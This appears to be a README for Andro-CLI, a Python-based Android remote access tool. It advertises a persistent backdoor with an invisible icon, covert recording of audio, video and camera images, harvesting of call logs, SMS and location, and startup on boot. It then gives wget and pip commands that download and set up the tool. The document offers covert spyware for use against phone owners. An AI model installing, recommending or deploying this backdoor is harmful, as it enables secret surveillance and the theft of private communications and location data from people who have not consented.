A python based remote android management suite, powered by Python
Full persistent backdoor with invisible icon on install
Record audio, video, take pictures from both cameras
Access call logs, SMS logs, location, and device details
Light weight APK runs continuously in background
App starts automatically on device boot
Get current location and device network details
Andro-CLI works on devices from Android 4.1 (Jelly Bean) to Android 9.0 (Oreo) (API 16 to API 28)
Note: Also works on Android 10 (Q) but some interpreter commands may be unstable.
wget https://github.com/AryanVBW/Andro-CLI/releases/download/ARDro2/androcli.zip && unzip androcli.zip
cd androcli
pip install -r requirements.txt
# Install virtualenv if not installed
pip install virtualenv
# Create a virtual environment
python -m venv andro-env
# Activate the virtual environment
# On Windows
andro-env\Scripts\activate
# On macOS/Linux
source andro-env/bin/activate